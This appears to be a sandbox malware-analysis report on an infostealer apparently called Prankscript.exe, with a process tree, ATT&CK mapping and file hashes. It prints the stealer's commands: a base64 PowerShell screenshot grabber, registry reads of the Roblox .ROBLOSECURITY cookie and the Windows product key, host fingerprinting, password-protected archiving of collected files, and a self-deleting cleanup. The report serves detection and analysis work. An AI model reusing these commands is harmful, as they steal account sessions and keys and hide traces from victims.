IAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4604
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0mxgobxy\0mxgobxy.cmdline"
        5⤵
        
        PID:2456
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8211.tmp" "c:\Users\Admin\AppData\Local\Temp\0mxgobxy\CSCCBF2EEEBB76B4A6188666ACA031D866.TMP"
        6⤵
        
        PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3144
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2000
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1980
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2284
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2940
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3016
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20762\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\kyAEw.zip" *"
    3⤵
    PID:5044
  - - C:\Users\Admin\AppData\Local\Temp\_MEI20762\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI20762\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\kyAEw.zip" *
      4⤵
      Executes dropped EXE
      PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4536
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3868
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:724

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3564

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C0 0x00000000000004A8
1⤵
PID:2952

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:580

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
74e4a39ae145a98de20041613220dfed

SHA1
ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

SHA256
2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

SHA512
96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
1bfc5e7bf6d96b9f00ddee46b691d640

SHA1
218a1f6326b31baec7c7b4e9b664bb6754af5328

SHA256
27a8db736ff0d11ea165b7db3156202ddafd242787287f65add6b1d5323d1aff

SHA512
a0d26ecf959a0dd172d28170e12addcf17b74031ce99a6de38b3fe535fd3cdf0c4cc6715f8979276a05ac5b7ae7959e0a9b968ba270ae77ed72f2880562a5f2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
d57c53dcd8caf6767c16b5e1e8e7f40b

SHA1
d3145857031b3e782bcca13fc2d079ef9f401bd5

SHA256
8fd416755f2f567ea88f742d7ee2afa23a30b4a28a5aab71149aa03d3a6951a9

SHA512
60bf39f68c4626ff56f4ba701b8722e7fb9238b960ca95189f5f9541ee38b01c5fac2c3f8f4e917aad0897233beff94dc5ce554f032b3e71d3ff5c7231812631

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
8165d331a65e980c7f75dba657342854

SHA1
44967c0388744de38b07e07e3a9cb174854eb7bf

SHA256
08d7b1fa1c3cdacb73cb9b34bb51a0516bfeac2f10ec54f2f27469d1c97820a9

SHA512
ee23180ed03c5042d6e6343ac2181a6d9ffbbb775e1031222e46b4a61eca4f1caf2dab50269271a07b284e270195595c91ce8c43d4cef77c8873845216546e54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
02cf1313b32a8ab2f031cee39bee8fc3

SHA1
861cc0ab9ff881460dd6433e37075b822aac9355

SHA256
7e7fd13903a8d57f314d9e7dab6fa28975050b63f045eb315e96cccaa17d1e61

SHA512
f5464c94391bfb590f6755c2ae6896dd459a2a93d778601caebf272438c2ff127ec5de81dcf8efeec65a56609558477afc7be1c4993977a18fde7b915f7a8700

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000074

Filesize
245KB

MD5
7f9910ea21896bb3e7bab154ecf9e715

SHA1
e17e23d6998e964a26271e46565f2945ff27189d

SHA256
c976d6a68e14746b9fc87035ff0485b8ba7187f0e872548979b23fbb15208f71

SHA512
cf917cb4747dbe7029998529b19409fdd06f5bcb6a991850002e329c806d204da97f717d89c25be1714bd231a6438900043e77e2864f28816dddaca90ee8ad0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
461f6e6e569323ef7bb954cb9eaa8cbe

SHA1
792b798a2ced6bbc50747a1e4c5cf567ffcde23e

SHA256
bc9d05fb1e0773954a72354a4cf12960ae591e312fad24a810b9f528c9cad41d

SHA512
2e60e5eef63cce7ed172e76f63cfcf763eecc5eae79eef286842b6ba40e9a1e7bfc49d0e0fd89b10ba386ecdaae91a4acc4232f03c2fe356ffe9e3096b533837

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
24224c6f243c89b7b6f9b5b4e83e9d37

SHA1
2f94ecc6fd07bbc72d1a147044779c9edb35d17b

SHA256
89da96a1cece6362043c382e7b09ddfdb6c547ecb460b727cb26a39fe5e5ecb3

SHA512
218806e6483dfcb9e46ec743becc300deef9b3cabe27d850cd6092a1d1fbbfd6240c137cd5442c2e94f2f9ec0755ddc38bfa41a13388af450a5a66533e29ecc9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe589db2.TMP

Filesize
3KB

MD5
ff6a86d943df87d49ae134159a168275

SHA1
e93f24e9f7b19b4c206de2857df9485fd13d1273

SHA256
6145183040a1ff90f7e4477fc5f0d758394117fbbe849b54c32691dc8a3c3f5b

SHA512
5abdcc2191cd128dab5ff48d96113c8fe1efd4e0959f93a649aa28cef85ac0244dab85eb3754ad18ca51056aa3aec3ad5cd2333340f51fb870be2e1a1f59626f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnGraphiteCache\data_1

Filesize
264KB

MD5
e2e27bf48f6a2e700db92679e67f4eed

SHA1
400165acf00f948b723b62df1b80b2831422245e

SHA256
982a15e3a38520d770da4c59ae484df53e9b50d71b4cb4a5985cb11b61bfec00

SHA512
b0b0ca43924159d83ee2f0c2b87cc56679758a9c78d044024571c2fb89e700f5a724584aca231b2874e6a5f32d5a0cb0afea1de3ec4bbf8b6314bd3540ed9d20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\d1b6a64c-504f-44ec-849b-1a1b1a60b5a8.tmp

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
69KB

MD5
164a788f50529fc93a6077e50675c617

SHA1
c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

SHA256
b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

SHA512
ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js

Filesize
9KB

MD5
3d20584f7f6c8eac79e17cca4207fb79

SHA1
3c16dcc27ae52431c8cdd92fbaab0341524d3092

SHA256
0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643

SHA512
315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000017.ldb

Filesize
26KB

MD5
2ecc759be55873ad8e6fd476d86214a4

SHA1
e58699f17beb39c6e195e98e379ce83c6f789ddd

SHA256
c57fa84875d4988fa598c98e1ca593de7713676f738556a8bad38f9af9d92dbe

SHA512
b00e2fe691f8e1155f1c5eaafcb762f85f5b4288f376f71818305a29d0ce667f4200253720b3f3b0b6f7b23d5e605fa1c7c229d53f4de593f213edc67373a4df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000020.ldb

Filesize
13KB

MD5
f8f4056a273feb5b6a2bcf543a37b42d

SHA1
878b8e9630ecf9a8716be92e44329a312c6e6063

SHA256
8405587afed1d2a2d5bb856f861b217f8782f3d627ad528779f0523a920a24b1

SHA512
4bb23c3962fca360ddd8a092582df0f37ea4f430b4b365ff94040c61569c98245826900705c159a34e8c479492eca32b1a16298a2c8288a29c62bf06d803dcf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG

Filesize
6KB

MD5
b11b476364061b89417f8caec99ba8d7

SHA1
713a57ccee4cc39a35fc065ff634ed1c14b30acb

SHA256
1f010328712c61ac0e6982e173c15a0f8d9afa7801ae931abf61d134896b3851

SHA512
4ff192a05a59abcc996cd8f30d2a99cb76b7b9d0b91b001a70cdf0f5ef27ada6908484b0f613f99d3bfeb0e0e14162f891aaf2ffe7c301e8f43c7c3c9c45d743

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001

Filesize
1KB

MD5
b5ba7ab9bd617c9dcf19ac21a4698a28

SHA1
260071728d99fe038462afd57690118779ac9a3b

SHA256
9868966a6e9cb1dfedf5b9007a8b774a471f7e5431ea55630a5c6f640941f72e

SHA512
32c7cc06c9d8da4dc1e426d8e68fb47a3b208fa9b9ec0255c41b84f447d18318d0fe8374539f3d389b76579ded1cb1c6dbee52a5d3acd7f4891576b867387085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\0be2a0dc-ec3b-4a5d-8965-fa4589af2c5e.tmp

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
821efb511251e55afe0d5f4ed75a03a5

SHA1
1cad847e3dda209a091044f7bae08c700ecb243b

SHA256
2778ae860ef3ba688fa8312294dbc18a298d861318a8a11e39709416daee6d98

SHA512
4d56a48b4dd07ef70a4ecbbcf2f153a0db8b7f66359003998f030cc056bfbed5c8ebb1e51487732ceb35557417b2f134547c12b05de095b3f74c88f554f1abe0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
492b6d77f43c549db5f77145bc3036d7

SHA1
824ddea65bdefccd1dfb3c6ac13f625f2b2a5197

SHA256
7b1cb1ce92b8a8766dee1418c21534c13bd9d21fcadf349c6b1e53de203d6cb0

SHA512
02ef4741025dca405efc421341ccc1ba92cacc927e9c9b04cee38248876436a4e60160ba01dd1f5d2e1cf8a70881eb1884b7b61a60afad207223281230a6c6cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
ac4956b48ef35860f8562bab80ea3ef7

SHA1
5bf2d56451ed6ad9d7e69bf8abfd6d6d706c9a91

SHA256
459226e9a5935345b83e9fafd710d8458800218006a824163d7ded2ba7e5195d

SHA512
c419f7dbce0a098401c681de4a1f44e5f884ca00dc64406fac092c884251c0b80fc63c69717f5086bf7843406033a560ae44b2689d45ce09af22f58a1080567c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
14KB

MD5
f636dc0d3582a525b97dfedc0a542cfb

SHA1
5068d13cadf2d6097b92cf1d41eb4324c98205ff

SHA256
78e59e41e020f4dd8d6a4d717426768d13a5d1b486fb2956513ece0564f8b02d

SHA512
e8b85eb253c83bb8972c981d41c6a747b071630cbb28a9bf2ff43e0d01250ef746ec9bbffb65c319c7320131624a87d87a631c864a6ea8f250bce9cc40731ec0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
15KB

MD5
98e26b61d9c4a8ad82404ae7d1ef3fb2

SHA1
fefa2a7ec080571f300e5f5947814e1fe67ac077

SHA256
7abba6de7f63b19365bce3f449d97608ff0aa7362f3cca587e4b742d3a53fd6d

SHA512
6ebf8a1f8cb97aeaf16f94de7c3d4f6d65b8489fcb12fc57de80480aa2e4d5e57448a9919b4ddbe3a6a53c2e1dbbc4ae91b39852ed898a2357032e5d561e6756

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
37KB

MD5
ea1780a5d3533b29211afdbd24675bbc

SHA1
2c5a75fdef5db2f4909480890630a3dea9cb164d

SHA256
4cd8077268bc98633d0dba44df402e3a22f8eede29c72e10bbcd3cd3a1554f73

SHA512
6a6ce7b19a69b8ab199679cdd6894896efa02e797b03924e40fcce0933997d1f4fd9ce456c0a3a0eb24d495cab52c0ff90c8bda080314ec32864fa23b1d68430

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\014fbb55-697b-4c6b-846d-afcf7a342ef4\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\9900a749-3853-4b2c-9b78-9f00e9dfc930\index-dir\the-real-index

Filesize
2KB

MD5
1dd29f7a902774c92f33a1890b42d489

SHA1
adef217e19927ebe5c7b2075b858eb531bc6f0dc

SHA256
677a2cfa62abaa2fc8fcc7cd26bafb98a443362c6296ead7ec0d4c19ed5d2746

SHA512
97f016dfeada1523a9f4f66f764f360c74699d013a03c0fbae66c9532564961de6ee72b8176598e83d8eb786ad27f269514a7ad08648c767cd1d210973a0047f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\9900a749-3853-4b2c-9b78-9f00e9dfc930\index-dir\the-real-index

Filesize
2KB

MD5
eab3034c4bec6b344dd67221671c9f59

SHA1
3f5901b0b32c75bf15d4031b56a5a143eee21522

SHA256
8f9bb1d8644a3f5b8f52d6a01b4f6174371fcf9ddd8458eacf5d5346a6b21669

SHA512
55ac12d7de29f80ee88f63eb2cb4544ccdbd7b1df303ba74763645af4fd4e1704577e3b6f3d82330848f7f317e64422d754fa64a8b91c668e810e67c88e158c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\9900a749-3853-4b2c-9b78-9f00e9dfc930\index-dir\the-real-index~RFe588b34.TMP

Filesize
48B

MD5
5d920ce22e437b0b9aea55262418e9a6

SHA1
bf62bec94434ece6dfd99fa418f6535de2ffd1e6

SHA256
25e7105ddde9eb8a66714c0977a171c640bb952fb01bc55c4584f24f0a669f08

SHA512
7a6c256918aca39675d4a5a544be5e92f3f52c8127b03ebc81b9d14f040c2f5fb93cdbd994135986330d1035f7446be2671865fbcfc263cd9a819619f2cbb84f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\d50af212-2c55-40cf-8bf2-982bb11b8f93\index-dir\the-real-index

Filesize
576B

MD5
7211b349edea23a377bf698b20377615

SHA1
e1d3ebb980d7368d0bd2d78394e489472a1cd8c9

SHA256
f0fb7fd219ae84f08ccd5ec00ebf43511d4d070504e1bcb0684d21547abb5098

SHA512
e679d61fbc69a1eb97551411d9c3ecb3ceb287bd0b86733b2839b15b0d2062341281a63f3815675aa7241aa3af255ef9a1ac948a2093ea83de9d7cadf1091d30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\d50af212-2c55-40cf-8bf2-982bb11b8f93\index-dir\the-real-index~RFe598013.TMP

Filesize
48B

MD5
1305cfefd99bf0049e91c11d500b217a

SHA1
b8f9883b6b078de309e57ff3331b34c09feb2ff8

SHA256
98465491002f933c7ca1981fca80a4727cdf9c0d89ad42ad5abbc2383c0fd15a

SHA512
bf927cf44c4cf3203a69fe38ddf52c320bc97ed255be082cd485e0e3628d11d861607d1aae91fff3376ae384e40ef635d0e82ddfd8ba790a8335cb8e32de091f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
6264e346b387dec4f5b463a76f13238c

SHA1
84906c80139385c93e6e47cb095ab5ef909fd77a

SHA256
286daf25f5ffef3834180725fd42995e2a6eacb3f3db52afad7da73163f7b710

SHA512
d760dbb67d34299d11063a16467d74da5694ba21eb60a1b96ba0db114fe79c5b4ee147fe539ec4a94a206a0055dbc8a337126a7ec2fad30e63eca8c4b956d0d4

Download Submit
